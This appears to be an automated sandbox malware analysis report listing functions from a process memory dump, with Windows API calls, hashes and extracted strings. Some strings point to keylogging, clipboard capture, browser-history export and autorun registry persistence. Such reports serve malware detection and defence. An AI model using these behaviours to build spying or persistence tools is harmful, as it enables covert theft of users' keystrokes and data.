                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: a9783e0c5437c6291b91fe8a779a279f7110a1751799d6c7d1725900a5571bc7
                                                                                                                        • Instruction ID: b713e5cbe18e26a03d8ff83c360c2a36a5a3c3b94759591155f2432ab3ef070c
                                                                                                                        • Opcode Fuzzy Hash: a9783e0c5437c6291b91fe8a779a279f7110a1751799d6c7d1725900a5571bc7
                                                                                                                        • Instruction Fuzzy Hash: 1E01AC32A59227ABC7214DF99C48FF6F7DCEF05BA57110A20F916D7240D721D814C6E0
                                                                                                                        Function 0293B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0293B647
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0293B66C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0293B67A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3919263394-0
                                                                                                                        • Opcode ID: 32e187adb267c3b4a00db149d848b6419e7db14f1312b49b0a181d8d67cba5aa
                                                                                                                        • Instruction ID: 13b7706cd2008a1d6c51149e4c50e97d80b48b7c942e7c2f83aa2b03ac00fb79
                                                                                                                        • Opcode Fuzzy Hash: 32e187adb267c3b4a00db149d848b6419e7db14f1312b49b0a181d8d67cba5aa
                                                                                                                        • Instruction Fuzzy Hash: BCF0F6B12452147FE6111A64BC94FBF775DDBC66BCF000629F912A2181CA614C098531
                                                                                                                        Function 0293850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 02938519
                                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 0293851F
                                                                                                                        • GetSystemMetrics.USER32(0000004E), ref: 02938525
                                                                                                                        • GetSystemMetrics.USER32(0000004F), ref: 0293852B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MetricsSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4116985748-0
                                                                                                                        • Opcode ID: 61bc3a88987d5f5bfbb893ecc8c93e23bc5cef8fb5dfd96d434fd6dfa28be116
                                                                                                                        • Instruction ID: 06cd18105b70e759640463bb2f6cb3e5f4dd75aabfca7adfe2f6a93212c57aed
                                                                                                                        • Opcode Fuzzy Hash: 61bc3a88987d5f5bfbb893ecc8c93e23bc5cef8fb5dfd96d434fd6dfa28be116
                                                                                                                        • Instruction Fuzzy Hash: 5CF0D663B043155BCA02AA78484462FBB97AFC02A0F150C7AF6199B341DEB4EC058BD1
                                                                                                                        Function 0293B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0293B395
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0293B3A8
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0293B3D3
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0293B3DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleOpenProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 39102293-0
                                                                                                                        • Opcode ID: 993e0ef6540397181cd3c6ddbcaf02f6ec7ed90f4220d48bfe294eda576a5646
                                                                                                                        • Instruction ID: 9a503f83ecd7c192729bb185eaafd71311c23d595df641e2801a56ad21f5908e
                                                                                                                        • Opcode Fuzzy Hash: 993e0ef6540397181cd3c6ddbcaf02f6ec7ed90f4220d48bfe294eda576a5646
                                                                                                                        • Instruction Fuzzy Hash: 79F02D716442256BD312B6949C7DFBBF2ACDB84795F010865F651D2190FFB08C454771
                                                                                                                        Function 02923A10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02923A2A
                                                                                                                          • Part of subcall function 0293AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,02985900,0292C07B,.vbs,?,?,?,?,?,029942F8), ref: 0293AB5F
                                                                                                                          • Part of subcall function 029376B6: CloseHandle.KERNEL32(02923AB9,?,?,02923AB9,02985324), ref: 029376CC
                                                                                                                          • Part of subcall function 029376B6: CloseHandle.KERNEL32(02985324,?,?,02923AB9,02985324), ref: 029376D5
                                                                                                                          • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
                                                                                                                        • Sleep.KERNEL32(000000FA,02985324), ref: 02923AFC
                                                                                                                        Strings
                                                                                                                        • /sort "Visit Time" /stext ", xrefs: 02923A76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                        • String ID: /sort "Visit Time" /stext "
                                                                                                                        • API String ID: 368326130-1573945896
                                                                                                                        • Opcode ID: c71d7ff7aea46d7b8056bc8438319e84f2928b4c3d92a6eed42dfa30e36aa881
                                                                                                                        • Instruction ID: a46a18ddee4b743d5bebf8142ff496474e6f21f7d23d94764693b61f6722e391
                                                                                                                        • Opcode Fuzzy Hash: c71d7ff7aea46d7b8056bc8438319e84f2928b4c3d92a6eed42dfa30e36aa881
                                                                                                                        • Instruction Fuzzy Hash: B1314F31A002285ADF18FBB4DCA59EEB777AFD0310F400069D40AA7199EE705E5ECE91
                                                                                                                        Function 029708DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02970B39,?,00000050,?,?,?,?,?), ref: 029709B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 0-711371036
                                                                                                                        • Opcode ID: 71c1b39ac67fbc614f78d6c356676e803c879e939a81f9c663939df0fd01cc7d
                                                                                                                        • Instruction ID: e83fb4ecfacc641055e4525e4bd4f6fc0e98550e6589f3cfa10849c0896fd755
                                                                                                                        • Opcode Fuzzy Hash: 71c1b39ac67fbc614f78d6c356676e803c879e939a81f9c663939df0fd01cc7d
                                                                                                                        • Instruction Fuzzy Hash: 25219262B04205AAFB34DB54C901BEBB3AEEBA4B64F564964ED89D7200F732D940C390
                                                                                                                        Function 0292AE58 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02953519: EnterCriticalSection.KERNEL32(02990D18,02995B70,02995BF0,?,0292179E,02995BF0), ref: 02953524
                                                                                                                          • Part of subcall function 02953519: LeaveCriticalSection.KERNEL32(02990D18,?,0292179E,02995BF0), ref: 02953561
                                                                                                                          • Part of subcall function 029538A5: __onexit.LIBCMT ref: 029538AB
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0292AEA7
                                                                                                                          • Part of subcall function 029534CF: EnterCriticalSection.KERNEL32(02990D18,02995BF0,?,029217C1,02995BF0,00000000), ref: 029534D9
                                                                                                                          • Part of subcall function 029534CF: LeaveCriticalSection.KERNEL32(02990D18,?,029217C1,02995BF0,00000000), ref: 0295350C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                        • API String ID: 2974294136-3686566968
                                                                                                                        • Opcode ID: 8d304054639d763696b5a4fb269ea87051106e4c538ec1318f2eb226f1dce144
                                                                                                                        • Instruction ID: 8f4b8bea60b50742779716f3ecf779d38fd250f8725c79f77e00f80400978f9f
                                                                                                                        • Opcode Fuzzy Hash: 8d304054639d763696b5a4fb269ea87051106e4c538ec1318f2eb226f1dce144
                                                                                                                        • Instruction Fuzzy Hash: EC217132A102299BCB18FBA8D8909EE777AAFD0320F500469D50667199EF706D5ECF94
                                                                                                                        Function 029249BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,02993EE8,029945A8,?,?,?,?,?,?,?,02934D7D,?,00000001,0000004C,00000000), ref: 029249F1
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        • GetLocalTime.KERNEL32(?,02993EE8,029945A8,?,?,?,?,?,?,?,02934D7D,?,00000001,0000004C,00000000), ref: 02924A4E
                                                                                                                        Strings
                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 029249E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                        • API String ID: 481472006-1507639952
                                                                                                                        • Opcode ID: 028fb54fbd0f8a270af993da6e352d6edef3b50945194789db377bf19b4296fe
                                                                                                                        • Instruction ID: a03215579a0a02d6ed70fbb6fb20668959246a416517c4215e1d716f2ab59ca2
                                                                                                                        • Opcode Fuzzy Hash: 028fb54fbd0f8a270af993da6e352d6edef3b50945194789db377bf19b4296fe
                                                                                                                        • Instruction Fuzzy Hash: 8C2157B2D082A06BD716FB7C98047BF7BA9ABD0328F88180CD44543259DF24552ECBE7
                                                                                                                        Function 0293A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                        • API String ID: 481472006-2430845779
                                                                                                                        • Opcode ID: 42329bee73cca607ade77d728be976dc1ed4e737d46d177c056bf8a54ac13418
                                                                                                                        • Instruction ID: 56e9304398787bf1a6fed2227c099c611e15f6bed3273500d192d679fdb1b24b
                                                                                                                        • Opcode Fuzzy Hash: 42329bee73cca607ade77d728be976dc1ed4e737d46d177c056bf8a54ac13418
                                                                                                                        • Instruction Fuzzy Hash: 501160725082145BC704FBA4EC608BF73EAABD4710F44492EF88AC21A5EF74DA5CCB56
                                                                                                                        Function 0292A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0292A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
                                                                                                                          • Part of subcall function 0292A876: wsprintfW.USER32 ref: 0292A905
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0292A7CA
                                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0292A7DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                        • String ID: Online Keylogger Stopped
                                                                                                                        • API String ID: 1623830855-1496645233
                                                                                                                        • Opcode ID: 39ea4667b879e793f4b591b5da5bfefa45ef89da3d3f1ba0ebb87b48c23e306a
                                                                                                                        • Instruction ID: 829cf3ea38861064052e0e9de21dddb5d632206379bf1abbc732be8c52ac3fbf
                                                                                                                        • Opcode Fuzzy Hash: 39ea4667b879e793f4b591b5da5bfefa45ef89da3d3f1ba0ebb87b48c23e306a
                                                                                                                        • Instruction Fuzzy Hash: 7D017B36E042209BDB22B734DC1A3FEBFBA9FC1324F80041CD4821218ADB61595DCBD6
                                                                                                                        Function 0293297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0292BFB2,00000000,029942E0,029942F8,?,pth_unenc), ref: 02932988
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 02932998
                                                                                                                        Strings
                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02932986
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteOpenValue
                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                        • API String ID: 2654517830-1051519024
                                                                                                                        • Opcode ID: 88f1fd3d76bfbc7818eb81a5cd1b2372ef8ea5855f3b379418dbf8bfc5192340
                                                                                                                        • Instruction ID: 3ed624c3c08e6affc0e06283230c1dcbb29d833841fd4326e075514fb5cf1519
                                                                                                                        • Opcode Fuzzy Hash: 88f1fd3d76bfbc7818eb81a5cd1b2372ef8ea5855f3b379418dbf8bfc5192340
                                                                                                                        • Instruction Fuzzy Hash: A8E01274A40304BBEF114FA1DD06FEA77ACBB80B88F004554F905E5080E371DD14A651
                                                                                                                        Function 02931699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0292E670), ref: 029316A9
                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 029316BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 1872346434-4028850238
                                                                                                                        • Opcode ID: 5b358549f8ec6f89177a427f7f0508c8f94208d7c6805b784e9a334be89d12c2
                                                                                                                        • Instruction ID: c87b4fae8eeefffd4702922640d1df6480187ad43e7417008ade8cad4124d7ee
                                                                                                                        • Opcode Fuzzy Hash: 5b358549f8ec6f89177a427f7f0508c8f94208d7c6805b784e9a334be89d12c2
                                                                                                                        • Instruction Fuzzy Hash: 2CD0C938DCD1129FDB414AACAC08BA57A6DBB15631F108A06F834412E0CB654478AA14
                                                                                                                        Function 0295FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02921AD8), ref: 0295FAF4
                                                                                                                        • GetLastError.KERNEL32 ref: 0295FB02
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0295FB5D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1717984340-0
                                                                                                                        • Opcode ID: 98ff0874764a81f39abb8920310761d6a0cce30dece1f1e7fa6a0de1111c4c5a
                                                                                                                        • Instruction ID: a50be29f26f9e0038eddb00720ffbf9a2209799a81fb79648d4b05dee6ad0ed2
                                                                                                                        • Opcode Fuzzy Hash: 98ff0874764a81f39abb8920310761d6a0cce30dece1f1e7fa6a0de1111c4c5a
                                                                                                                        • Instruction Fuzzy Hash: 2241F231700666EBCB21CF64C854BBABBA9EF42334F1545ADEC5D9B5A0EB318801CB51